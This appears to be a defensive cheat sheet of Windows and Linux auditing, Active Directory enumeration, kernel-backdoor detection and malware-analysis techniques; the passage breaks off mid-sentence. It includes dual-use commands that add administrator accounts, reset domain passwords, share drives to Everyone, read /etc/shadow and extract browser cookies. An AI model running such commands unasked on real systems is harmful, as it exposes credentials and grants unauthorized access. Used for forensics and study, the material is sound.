Listing processes with DLLs
 C:\> tasklist /m
Listing Processes with remote IPs
 tasklist /S ip /v
Listing Processes with their executables
 C:\> tasklist /SVC /fi "imagename eq
 svchost.exe"
Force Process to terminate
 taskkill /PID pid /F
Scheduled tasks list
[1]
 C:\> schtasks
[2]
 Get-ScheduledTask
Managing network services
 C:\> net start
Managing services with   sc   and   wmic
 C:\> sc query
 C:\> wmic service list brief
 C:\> wmic service list config
 C:\> wmic process list brief
 C:\> wmic process list status
 C:\> wmic process list memory
 C:\> wmic job list brief | findstr "Running"
Services running with PowerShell
[1]
 PS C:\> Get-Service | Where-Object { $_.Status
 -eq "running" }
[2]
 get-service
Auditing Group Policy
Any of the commands below will list the current GPO
settings and the second and third ones will send the
output to an external file
 C:\> gpresult /r
 C:\> gpresult /z > <OUTPUT FILE NAME>.txt
 C:\> gpresult /H report.html /F
With wmic
 C:\> wmic qfe
Auditing startup items
With wmic
 C:\> wmic startup list full
 C:\> wmic ntdomain list brief
By viewing the contents of the startup folder
 C:\> dir
 "%SystemDrive%\ProgramData\Microsoft\Windows\S
 tart Menu\Programs\Startup"
 C:\> dir "%SystemDrive%\Documents and
 Settings\All Users\Start Menu\Programs\Startup"
 C:\> dir "%userprofile%\Start
 Menu\Programs\Startup"
 C:\> dir "%ProgramFiles%\Startup\"
 C:\> dir "C:\Windows\Start
 Menu\Programs\startup"
 C:\> dir
 "C:\Users\%username%\AppData\Roaming\Microsoft
 \Windows\Start Menu\Programs\Startup"
 C:\> dir
 "C:\ProgramData\Microsoft\Windows\Start
 Menu\Programs\Startup"
 C:\> dir "%APPDATA%\Microsoft\Windows\Start
 Menu\Programs\Startup"
 C:\> dir
 "%ALLUSERSPROFILE%\Microsoft\Windows\Start
 Menu\Programs\Startup"
 C:\> dir "%ALLUSERSPROFILE%\Start
 Menu\Programs\Startup"
Through wininit
 C:\> type C:\Windows\winstart.bat
 C:\> type %windir%\wininit.ini
 C:\> type %windir%\win.ini
With Sysinternal tools
 C:\> autorunsc -accepteula -m
 C:\> type C:\Autoexec.bat
You can also export the output to a CSV file
 C:\> autorunsc.exe -accepteula -a -c -i -e -f
 -l -m -v
With registry
 C:\> reg query HKCR\Comfile\Shell\Open\Command
 C:\> reg query HKCR\Batfile\Shell\Open\Command
 C:\> reg query HKCR\htafile\Shell\Open\Command
 C:\> reg query HKCR\Exefile\Shell\Open\Command
 C:\> reg query HKCR\Exefiles\Shell\Open\Command
 C:\> reg query HKCR\piffile\shell\open\command
 C:\> reg query "HKCU\Control Panel\Desktop"
 C:\> reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
 C:\> reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
 C:\> reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
 C:\> reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
 C:\> reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
 C:\> reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
 C:\> reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Windows\Run
 C:\> reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Windows\Load
 C:\> reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Windows\Scripts
 C:\> reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f run
 C:\> reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f load
 C:\> reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
 C:\> reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU
 C:\> reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU
 C:\> reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU
 C:\> reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePidlMRU /s
 C:\> reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
 C:\> reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
 C:\> reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
 C:\> reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\RegEdit /v LastKey
 C:\> reg query "HKCU\Software\Microsoft\Internet Explorer\TypedURLs"
 C:\> reg query "HKCU\Software\Policies\Microsoft\Windows\Control Panel\Desktop"
 C:\> reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components" /s
 C:\> reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
 C:\> reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
 C:\> reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
 C:\> reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
 C:\> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
 C:\> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 C:\> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
 C:\> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
 C:\> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
 C:\> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce
 C:\> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\Userinit
 C:\> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
 C:\> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks" /s
 C:\> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
 C:\> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /f AppInit_DLLs
 C:\> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f Shell
 C:\> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f Userinit
 C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\System\Scripts
 C:\> reg query HKLM\SOFTWARE\Classes\batfile\shell\open\command
 C:\> reg query HKLM\SOFTWARE\Classes\comfile\shell\open\command
 C:\> reg query HKLM\SOFTWARE\Classes\exefile\shell\open\command
 C:\> reg query HKLM\SOFTWARE\Classes\htafile\Shell\Open\Command
 C:\> reg query HKLM\SOFTWARE\Classes\piffile\shell\open\command
 C:\> reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
 C:\> reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager"
 C:\> reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs"
 C:\> reg query "HKLM\SYSTEM\ControlSet001\Control\Session Manager\KnownDLLs"
Auditing Network Shares
 C:\> net use \\<TARGET IP ADDRESS>
 C:\> net share
 C:\> net session
With wmic
 C:\> wmic volume list brief
 C:\> wmic logicaldisk get
 description,filesystem,name,size
 C:\> wmic share get name,path
Net Commands
Hosts in current domain
 net view /domain
Hosts in example.com
 net view /domain:example.com
All users in current domain
 net user /domain
Add user
 net user user pass /add
Add user to Administrators
 net localgroup "Administrators" user /add
Show Domain password policy
 net accounts /domain
List local Admins
 net localgroup "Administrators"
List domain groups
 net group /domain
List users in Domain Admins
 net group "Domain Admins" /domain
List domain controllers for current domain
 net group "Domain Controllers" /domain
Current SMB shares
 net share
Active SMB sessions
 net session | find "\\"
Unlock domain user account
 net user user /ACTIVE:yes /domain
Change domain user password
 net user user "newpassword" /domain
Share folder
 net share share c:\share /GRANT:Everyone,FULL
Auditing AD with PowerView.ps1
Download link
 https://github.com/PowerShellMafia/PowerSploit
 /tree/master/Recon
First we import the modules
 Import-Module powerview.ps1
Retrieve domain controller information
 Get-NetDomainController
Enumerating logged-in users in the current workstation
and the domain controller
 PS C:\Tools\active_directory> Get-NetLoggedon
Get current active sessions on the domain controller
 PS C:\Tools\active_directory> Get-NetSession
Listing Computers
 Get-NetComputer | select name
Get users created/modified after a specific date
 Get-ADUser -Filter {((Enabled -eq $True) -and
 (Created -gt "Monday, April 10, 2023 00:00:00
 AM"))} -Property Created, LastLogonDate |
 select SamAccountName, Name, Created | Sort-
 Object Created
Get computers joined to the domain along with date and
other relevant details
 Get-ADComputer -filter * -properties
 whencreated | Select Name,@{n="Owner";e={(Get-
 Acl "ad:\$($_.distinguishedname)").owner}},
 whencreated
More cmdlets can be found below
 https://powersploit.readthedocs.io/en/latest/R
 econ/
Linux
Auditing System Information
 # uname -a
 # uptime
Auditing Users
View logged in users
 w
 who
Show if a user has ever logged in remotely
 lastlog
 last
View failed logins
 faillog -a
View local user accounts
 cat /etc/passwd
 cat /etc/shadow
View local groups
 cat /etc/group
View sudo access
 cat /etc/sudoers
View accounts with UID 0 (root)
[1]
 # awk -F: '($3 == "0") {print}' /etc/passwd
[2]
 # egrep ':0+' /etc/passwd
Bash history for the root user
 # cat /root/.bash_history
Files opened by a user
 # lsof -u user-name
Auditing Startups
In Linux, startup and autoruns can be investigated by
viewing the Cron jobs.
List Cron jobs
 crontab -l
List Cron jobs by root and other UID 0 accounts
 crontab -u root -l
Review for unusual Cron jobs
 cat /etc/crontab
 ls /etc/cron.*
Auditing Network Information
View network interfaces
 ifconfig
View network connections
 netstat -antup
 netstat -plantux
View listening ports
 netstat -nap
View network routes
 route
View ARP table
 arp -a
List of processes listening on ports
 lsof -i
Auditing Logs
Auditing authentication logs
 # tail /var/log/auth.log
 # grep -i "fail" /var/log/auth.log
Auditing User login logs in Ubuntu
 tail /var/
Auditing samba activity
 grep -i samba /var/log/syslog
Auditing Cron job logs
 grep -i cron /var/log/syslog
Auditing sudo logs
 grep -i sudo /var/log/auth.log
Filtering 404 logs in Apache
 grep 404 apache-logs.log | grep -v -E
 "favicon.ico|robots.txt"
Auditing files requested in Apache
 head access_log | awk '{print $7}'
View root user command history
 # cat /root/.*history
View last logins
 last
Auditing Applications
List all installed packages along with their versions:
However, it's important to note that this method will only
list applications and programs installed through the
system's package manager. Unfortunately, there is no
surefire way to list manually installed programs and their
components generally, which often requires more manual
file system analysis.
 sudo dpkg -l
The   .viminfo   file stands out as it contains important
information about user interactions within Vim sessions.
The command history stored in           .viminfo   provides a
chronological record of commands executed by users and
can be a valuable resource for reconstructing user
activities.
 find /home/ -type f -name ".viminfo"
 2>/dev/null
List out the browser directories within the
workstation's    /home   folder
 sudo find /home -type d \( -path
 "*/.mozilla/firefox" -o -path
 "*/.config/google-chrome" \) 2>/dev/null
The above command can also lead to discovering user
profiles which can be investigated for browsing activity.
Forensic tools like Dumpzilla, for instance, are designed
to parse and extract valuable information from browser
artefacts, providing investigators with a structured
overview of user activity. Dumpzilla can parse data from
various web browsers and allow us to analyse browsing
histories, bookmarks, download logs, and other relevant
artefacts in a streamlined manner.
```bash
sudo python3 dumpzilla.py /home/motasem/.mozilla/firefox/motasem.default-release --Summary --Verbosity CRITICAL
```
We can also extract cookies:
```bash
sudo python3 dumpzilla.py /home/motasem/.mozilla/firefox/motasem.default-release --Cookies
```
Kernel Backdoors
A kernel backdoor is a malicious piece of code (often a
kernel module) loaded into the operating system’s kernel
space. Unlike userland malware, this code has elevated
privileges and can:
     Hide processes, files, or network activity.
     Provide stealthy persistence.
     Create covert channels or unauthorized root access.
In Linux, these are often implemented as Loadable Kernel
Modules (LKMs) with a   .ko   extension. The attacker loads
them via tools like   insmod , modprobe , or scripts
during system boot.
To discover these modules, follow the steps below:
Check Kernel Logs for Suspicious
Modules
Start with   dmesg    to inspect what modules have been
loaded or messages printed by the kernel.
 dmesg | grep -i spatch
This might show something like:
 [     12.345] Loading sneaky patch module...
Investigate the Kernel Module Itself
Use   modinfo   to gather metadata:
 modinfo spatch.ko
Sample output:
 filename:             /lib/modules/.../spatch.ko
 description:          Sneaky kernel module
 author:               Unknown
 license:              GPL
Then navigate to where the      .ko       file is stored:
 cd /lib/modules/$(uname -r)/
 find . -name "spatch.ko"
Extract and Analyze with strings
Some IOCs might be embedded directly as an ASCII string or
encoded.
 strings spatch.ko | less
Summary
     Hiding processes: hooking functions like readdir()
     or getdents() to hide entries in /proc .
     Hiding files: overriding filesystem read operations
     to exclude specific filenames.
     Hiding connections: manipulating /proc/net/tcp or
     Netfilter hooks.
     Root escalation: replacing setuid() or exploiting
     /proc entries to grant root access.
     Keylogging: capturing keystrokes via interrupt
     handlers or input subsystem hooks.
Tools/Functions Often Abused
      kallsyms_lookup_name :              Used to resolve addresses
     of kernel functions not exported normally.
      sys_call_table :       Often hooked to redirect system
     calls.
      init_module()     &   cleanup_module() :    Entry and
     exit points of a kernel module.
AD Enumeration with DSquery
Listing users
 dsquery user -limit 0
Listing Groups
The assumed domain below is          target.com
 dsquery group "cn=users,dc=target,dc=com"
Listing Domain Admins
 dsquery group -name "domain admins" | dsget
 group -members -expand
List groups a user is member of
 dsquery user -name user | dsget user -memberof
 -expand
Getting a user's ID
 dsquery user -name bob | dsget user -samid
List inactive accounts for 3 weeks
 dsquery user -inactive 3
Identification and Detection
Malware Analysis
Creating The Environment
A lab setup for malware analysis requires the ability to
save the state of a machine (snapshot) and revert to that
state whenever required. The machine is thus prepared
with all the required tools installed, and its state is
saved. After analyzing the malware in that machine, it is
restored to its clean state with all the tools installed.
This activity ensures that each malware is analyzed in an
otherwise clean environment, and after analysis, the
machine can be reverted without any sustained damage.
Following these steps ensures that your VM is not
contaminated with remnants of previous malware samples
when analyzing new malware. It also ensures that you
don't have to install your tools again and again for each
analysis.
 1. Create a fresh Virtual Machine with a
 new OS install
 2. Set up the machine by installing all the
 required analysis tools in it
 3. Take a snapshot of the machine
 4. Copy/Download malware samples inside
 the VM and analyze it
 5. Revert the machine to the snapshot after
 the analysis completes
Static Analysis
Definition
Static analysis means analyzing the file without
executing it. In static analysis we aim to extract the
below details
 1-   File extension
 2-   Hash
 3-   IOCs (IPs, domains, hostnames, hashes)
 4-   Useful strings
 5-   Imports and Exports (API Calls)
 6-   Sections (.text, .rsrc, .data)
Tools
There are many static analysis tools. The below are the
most popular ones
 1-   winitor (GUI)
 2-   pe-tree (GUI)
 3-   pecheck (non-GUI)
 4-   strings (non-GUI)
 5-   VirusTotal (Online)
 6-   Radare2 (Advanced)
 7-   Ghidra (Advanced)
 8- ProcDOT (GUI)
 9- wxHexEditor
 10- FLOSS
Key PE headers to pay attention to when
analyzing the malware statically
 - IMAGE_IMPORT_DESCRIPTOR
 - IMAGE_NT_HEADERS specifically;
 Signature,File_Header and Optional_Headers
 - IMAGE_SECTION_HEADER. Specifically the
 r.text section
 - SizeOfRawData and Misc_VirtualSize: To
 identify if the binary is packed or
 obfuscated.
 - Entropy: To identify if the binary is packed
 or obfuscated.
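Entropy here means Shannon entropy, measured in bits per byte: well-compressed, encrypted, or packed data approaches the maximum of 8, while plain code and text sits noticeably lower. A minimal sketch of the calculation (the idea, not any specific tool's implementation):

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte buffer, in bits per byte (0.0 - 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

# A repetitive buffer has minimal entropy; a buffer where every byte
# value appears equally often hits the 8-bit maximum.
print(shannon_entropy(b"A" * 100))          # 0.0
print(shannon_entropy(bytes(range(256))))   # 8.0
```

Tools such as pestudio report this per PE section, so a high-entropy `.text` section is a quick packing indicator.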
Hex and Ascii View of the suspected file
 hexdump -C -n 500 file.exe
 od -x file.exe
 xxd file.exe
Analyzing strings
Non obfuscated binaries
String search is important to uncover artifacts and
indicators of compromise about the malware. The
following information can be extracted by doing a strings
search
 - Windows Functions and APIs, like
 SetWindowsHook, CreateProcess, InternetOpen,
 etc. They provide information about the
 possible functionality of the malware
 - IP Addresses, URLs, or Domains can provide
 information about possible C2 communication.
 The Wannacry malware's killswitch domain was
 found using a string search
 - Miscellaneous strings such as Bitcoin
 addresses, text used for Message Boxes, etc.
 This information helps set the context for
 further malware analysis
Strings can be uncovered using the   strings   tool
In Windows
 Strings.exe path-to-binary
In Linux
 strings path-to-binary
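For intuition, the core of what strings does can be sketched in a few lines of Python: extract runs of printable ASCII of a minimum length (the real tool also handles wide/UTF-16 strings, which this sketch ignores):

```python
import re

def extract_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Return printable-ASCII runs of at least `min_len` characters."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]

# Hypothetical buffer mixing binary noise with an API name and an IP address
sample = b"\x00\x01InternetOpenA\x00\xff192.168.1.10\x00ab\x00"
print(extract_strings(sample))  # ['InternetOpenA', '192.168.1.10']
```

The short run `ab` is dropped because it is below the minimum length, which is exactly why `strings` defaults to a 4-character threshold: it filters out byte sequences that are printable only by coincidence.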
Obfuscated binaries
Malware authors use several techniques to obfuscate the
key parts of their code. These techniques often render a
string search ineffective, i.e., we won't find much
information when we search for strings.
To uncover these obfuscated strings, we use             FLOSS   tool
 C:\Users\Administrator\Desktop>floss --no-
 static-strings <path to binary>
More about   FLOSS
 https://www.mandiant.com/resources/blog/automa
 tically-extracting-obfuscated-strings
Extracting File Hash
[1]
 md5sum <file>
[2] with powershell
 Get-FileHash -Path <filename> -Algorithm MD5
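The same hashes can also be computed with Python's standard hashlib module; a small sketch (chunked reads keep memory use constant on large samples, and SHA-256 is shown alongside MD5 since MD5 alone is collision-prone):

```python
import hashlib
import io

def stream_hashes(stream) -> dict:
    """Compute MD5 and SHA-256 from a binary stream, reading 64 KiB chunks."""
    md5, sha256 = hashlib.md5(), hashlib.sha256()
    for chunk in iter(lambda: stream.read(65536), b""):
        md5.update(chunk)
        sha256.update(chunk)
    return {"md5": md5.hexdigest(), "sha256": sha256.hexdigest()}

# Usage on a real file:
#   with open("sample.exe", "rb") as f:
#       print(stream_hashes(f))
demo = stream_hashes(io.BytesIO(b"hello"))
print(demo["md5"])  # 5d41402abc4b2a76b9719d911017c592
```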
Finding The Imphash
The imphash stands for "import hash". Imports are
functions that an executable file imports from other files
or Dynamically Linked Libraries (DLLs). The imphash is a
hash of the function calls/libraries that a malware sample
imports and the order in which these libraries are present
in the sample. This helps identify samples from the same
threat groups or performing similar activities.
The resulting hash can then be looked up in
MalwareBazaar or other threat intelligence sites to find
the malware family that uses the same imports and
therefore shares this imphash.
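The algorithm itself is simple: lowercase each dll.function pair (with the DLL extension stripped), join the pairs in import-table order, and MD5 the result. A sketch following the normalization used by the widely adopted pefile implementation (in practice you would call pefile's `get_imphash()` on the binary rather than supply the pairs by hand):

```python
import hashlib

def imphash(imports: list) -> str:
    """imports: (dll, function) pairs in import-table order."""
    parts = []
    for dll, func in imports:
        dll = dll.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if dll.endswith(ext):
                dll = dll[: -len(ext)]
        parts.append("%s.%s" % (dll, func.lower()))
    return hashlib.md5(",".join(parts).encode()).hexdigest()

# Order matters: the same imports in a different order yield a different hash,
# which is what lets imphash fingerprint how a sample was built.
h1 = imphash([("KERNEL32.dll", "CreateProcessA"), ("WININET.dll", "InternetOpenA")])
h2 = imphash([("WININET.dll", "InternetOpenA"), ("KERNEL32.dll", "CreateProcessA")])
```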
Analyzing The Signature
Signatures are a way to identify if a particular file has a
particular type of content. A signature is a sequence of
bytes in a file, with or without any context regarding
where it is found. Signatures are used to identify patterns
in a file, determine whether a file is malicious, and
identify suspected behavior and malware family.
The signature can be analyzed using either   Yara Rules
or collective antivirus scanning through VirusTotal.
Capa helps identify the capabilities found in a PE file. Capa
reads the files and tries to identify the behavior of the file
based on signatures such as imports, strings, mutexes,
and other artifacts present in the file.
 capa malware-sample
Link to Capa
 https://github.com/mandiant/capa
Analyzing PE Headers
pe-tree
A tool used to dissect and analyze any portable executable
headers
In pe-tree’s right pane, we see tree-structure dropdown
menus; the left pane contains shortcuts to those menus.
All of the above headers are of the data type STRUCT.
The IMAGE_DOS_HEADER
The IMAGE_DOS_HEADER consists of the first 64 bytes of
the PE file. When we look at an executable in a hex
editor such as wxHexEditor, we can highlight the first
64 bytes as the IMAGE_DOS_HEADER.
The MZ characters are an identifier of the Portable
Executable format. When these two bytes are present at
the start of a file, the Windows OS considers it a Portable
Executable format file.
This means that the magic number of a portable
executable file is   0x5a4d . On disk the bytes appear
reversed ( 4d 5a , i.e. MZ ) due to little-endian byte
order.
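This layout can be verified with a few lines of Python using the standard struct module: e_magic is the little-endian WORD at offset 0, and e_lfanew (the offset of IMAGE_NT_HEADERS, discussed below) is the little-endian DWORD at offset 0x3C. The 64-byte header here is a fabricated example, not a real binary:

```python
import struct

def parse_dos_header(data: bytes) -> dict:
    """Pull e_magic and e_lfanew out of a 64-byte IMAGE_DOS_HEADER."""
    e_magic = struct.unpack_from("<H", data, 0)[0]       # WORD at offset 0
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]   # DWORD at offset 0x3C
    return {"e_magic": hex(e_magic), "e_lfanew": e_lfanew}

# Fake DOS header: 'MZ' magic, NT headers placed at offset 0x80
hdr = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x80)
print(parse_dos_header(hdr))  # {'e_magic': '0x5a4d', 'e_lfanew': 128}
```

Reading the two raw bytes `4d 5a` as a little-endian WORD yields `0x5a4d`, which is exactly the "reversed" value seen in hex editors.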
In pe-tree, the magic number can be found by expanding
the IMAGE_DOS_HEADER section and highlighting the
 e_magic   value.
The DOS_STUB
The DOS STUB contains the message that can also be seen
in any Hex Editor    !This program cannot be run in
DOS mode
The DOS STUB is a small piece of code that only runs if the
PE file is incompatible with the system it is being run on.
IMAGE_NT_HEADERS
This header contains most of the vital information related
to the PE file. The starting address of IMAGE_NT_HEADERS
is found in   e_lfanew   from the IMAGE_DOS_HEADER.
NT_HEADERS
The NT_HEADERS consist of the following:
     Signature
     The first 4 bytes of the NT_HEADERS consist of the
     Signature. Usually if the binary is PE, then in any
     text editor you would see          PE   at the byte address of
     the signature.
     FILE_HEADER
     FileHeader has the below fields
     Machine: This field mentions the type of
     architecture for which the PE file is written.
     NumberOfSections: A PE file contains different
     sections where code, variables, and other resources
     are stored. This field of the IMAGE_FILE_HEADER
     mentions the number of sections the PE file has.
     TimeDateStamp: This field contains the time and
     date of the binary compilation.
     PointerToSymbolTable and NumberOfSymbols: These
     fields are not generally related to PE files. Instead,
     they are here due to the COFF file headers.
     SizeOfOptionalHeader: This field contains the size of
     the optional header.
     Characteristics: This is another critical field. This
     field mentions the different characteristics of a PE
     file.
     OPTIONAL_HEADER
     Important fields that go under this header are:
     Magic: The Magic number tells whether the PE file is
     a 32-bit or 64-bit application. If the value is
      0x010B , it denotes   a 32-bit application; if the
     value is 0x020B , it   represents a 64-bit application.
     AddressOfEntryPoint: This field is significant from a
malware analysis/reverse-engineering point of view.
This is the address from where Windows will begin
execution. In other words, the first instruction to be
executed is present at this address. This is a
Relative Virtual Address (RVA), meaning it is at an
offset relative to the base address of the
image (ImageBase) once loaded into memory.
BaseOfCode and BaseOfData: These are the
addresses of the code and data sections,
respectively, relative to ImageBase.
ImageBase: The ImageBase is the preferred loading
address of the PE file in memory. Generally, the
ImageBase for .exe files is       0x00400000
Subsystem: This represents the Subsystem required
to run the image. The Subsystem can be Windows
Native, GUI (Graphical User Interface), CUI
(Commandline User Interface), or some other
Subsystem.
DataDirectory: The DataDirectory is a structure that
contains import and export information of the PE file
(called Import Address Table and Export Address
Table). This information is handy as it gives a
glimpse of what the PE file might be trying to do.
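The signature, FILE_HEADER fields, and OPTIONAL_HEADER Magic described above can be parsed with nothing but the struct module; a hedged sketch (helper name illustrative, pure stdlib, no third-party PE library):

```python
import struct

def parse_nt_headers(data: bytes, e_lfanew: int) -> dict:
    """Walk IMAGE_NT_HEADERS: the 4-byte 'PE\\0\\0' signature, then the
    20-byte FILE_HEADER, then the OPTIONAL_HEADER whose Magic word
    distinguishes PE32 (0x10B) from PE32+ (0x20B)."""
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    # FILE_HEADER starts right after the 4-byte signature
    machine, n_sections, timestamp = struct.unpack_from(
        "<HHI", data, e_lfanew + 4)
    # OPTIONAL_HEADER starts after the 20-byte FILE_HEADER
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]
    bitness = {0x10B: "32-bit", 0x20B: "64-bit"}.get(magic, "unknown")
    return {"Machine": machine, "NumberOfSections": n_sections,
            "TimeDateStamp": timestamp, "Bitness": bitness}
```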
IMAGE_SECTION_HEADER
Stores information about the data that a PE file
needs to perform its functions, like code, icons,
images, User Interface elements, etc. It contains
the following sections:
.text: The .text section is generally the section that
contains executable code for the application. It
includes   CODE, EXECUTE and READ,        meaning that
this section contains executable code, which can be
read but can't be written to.
      .data: This section contains initialized data of the
      application. It has READ/WRITE permissions but
      doesn't have EXECUTE permissions.
      .rdata/.idata: These sections often contain the
      import information of the PE file. Import information
      helps a PE file import functions from other files or
      Windows API.
      .ndata: The .ndata section contains uninitialized
      data.
      .reloc: This section contains relocation information
      of the PE file.
      .rsrc: The resource section contains icons, images,
      or other resources required for the application UI.
Each section header (such as   .text ) contains the below important fields
VirtualAddress: This field indicates this section's Relative
Virtual Address (RVA) in the memory.
VirtualSize: This field indicates the section's size once
loaded into the memory.
SizeOfRawData: This field represents the section size as
stored on the disk before the PE file is loaded in memory.
Characteristics: The characteristics field tells us the
permissions that the section has. For example, if the
section has READ permissions, WRITE permissions or
EXECUTE permissions.
The IMAGE_IMPORT_DESCRIPTOR
The IMAGE_IMPORT_DESCRIPTOR structure contains
information about the different Windows APIs that the PE
file loads when executed to perform its functions.
For example, if a PE file imports CreateFile API, it
indicates that it might create a file when executed.
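As a toy illustration of that triage step, the mapping below associates imported API names with the behavior they hint at; the table is an assumption for demonstration, not an authoritative list:

```python
# Hypothetical mapping of imported APIs to the behavior they hint at
# (illustrative only -- real triage uses much larger reference lists).
API_HINTS = {
    "CreateFileA": "creates or opens files",
    "RegSetValueExA": "writes registry values",
    "InternetOpenA": "initiates network activity",
    "VirtualAlloc": "allocates memory (common before unpacking/injection)",
}

def triage_imports(imported_names):
    """Return only the imports we have a behavioral hint for."""
    return {name: API_HINTS[name] for name in imported_names
            if name in API_HINTS}
```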
Dynamic Analysis
Definition
Dynamic analysis is characterized by opening the file in a
sandbox environment and observing its behavior. In
dynamic analysis, we aim to extract the below details
about the sample
 1- Files created and modified by the sample
 2- Network connections
 3- Queried registry keys in addition to
 created and modified ones by the sample.
 4- Processes created.
 5- Startup entries created.
Dynamic analysis tools
Dynamic analysis tools are run inside a sandbox which is a
dedicated environment for testing malware. Sandboxes
could be any virtual machine that comes with analysis
tools installed for this purpose. Below are some
sandboxes; you can either install them locally or use
their services online.
Sandboxes
 1-   Cuckoo sandbox (online + virtual machine)
 2-   CAPE sandbox (online + virtual machine)
 3-   Any.run (online)
 4-   Hybrid Analysis (online)
 5-   Intezer (Online)
Analysis tools
The below tools can be installed on a virtual machine if
you want to build one from scratch and equip it with the
below tools used for dynamic analysis
 1-   Process Monitor (GUI)
 2-   Process Hacker (GUI)
 3-   AutoRuns (GUI)
 4-   netstat (command line)
 5-   Wireshark (GUI)
 6-   Tcpdump (command line)
 7-   Crowdstrike
 8-   Process Explorer
Dynamic Analysis with Process Monitor
The controls of ProcMon are self-explanatory, and a brief
description is shown if we hover over one of the controls.
The most important controls are:
   1. Shows the Open and Save options. These options
       are for opening a file that contains ProcMon events
       or saving the events to a supported file.
   2. Shows the Clear option. This option clears all the
      events currently being shown by ProcMon. It is
       good to clear the events once we execute a
       malware sample of interest to reduce noise.
   3. Shows the Filter option, which gives us further
       control over the events shown in the ProcMon
       window.
4. These are toggles to turn off or on Registry,
   FileSystem, Network, Process/Thread, and Profiling
   events.
   If we right-click on the process column on the
   process of our choice, a pop-up menu opens up.
   We can see different options in the pop-up menu.
   Some of these options are related to filtering. For
   example, if we choose the option   Include
   'Explorer.EXE' ,     ProcMon will only show events
   with Process Name Explorer.EXE. If we choose the
   option    Exclude 'Explorer.EXE' ,   it will exclude
   Explorer.EXE from the results. Similarly, we can
   right-click on other columns of the events window
   to filter other options.
ProcMon also allows us to implement advanced
filters. Clicking the Filter option (number 3 above)
opens a window where filter conditions can be
defined.
ProcMon also allows us to view all the existing
processes in a parent-child relationship, forming a
process tree. This can be done by clicking the
process-tree icon in the toolbar (Ctrl+T). This
option helps identify the
parents and children of different processes.
Dynamic Analysis with API Logger
The Windows OS isolates applications from the hardware and
instead offers an Application Programming Interface (API).
Examples include APIs for creating and deleting files,
processes, and registry keys. Monitoring the APIs a
program calls is therefore one technique to spot malware
behavior. API names are typically self-explanatory; to
learn more about any of them, you can turn to the
Microsoft Documentation.
The API Logger is a simple tool that provides basic
information about APIs called by a process.
To open a new process, we can click the highlighted
three-dot menu. When clicked, a file browser allows us to
select the executable for which we want to monitor the
API calls. Once we select the executable, we can click
'Inject & Log' to start the API logging process. The log
of API calls appears in the lower pane, while the upper
pane shows the running processes and their PIDs.
We can see the PID of the process we monitor and the API
called with basic information about the API in the 'msg'
field.
To log API calls of an already running process instead, we
can click the 'PID' menu and select the target process.
Dynamic Analysis with API Monitor
The API Monitor provides more advanced information about
a process's API calls.
   1. This tab is a filter for the API group we want to
      monitor. For example, we have a group for
      'Graphics and Gaming' related APIs, another for
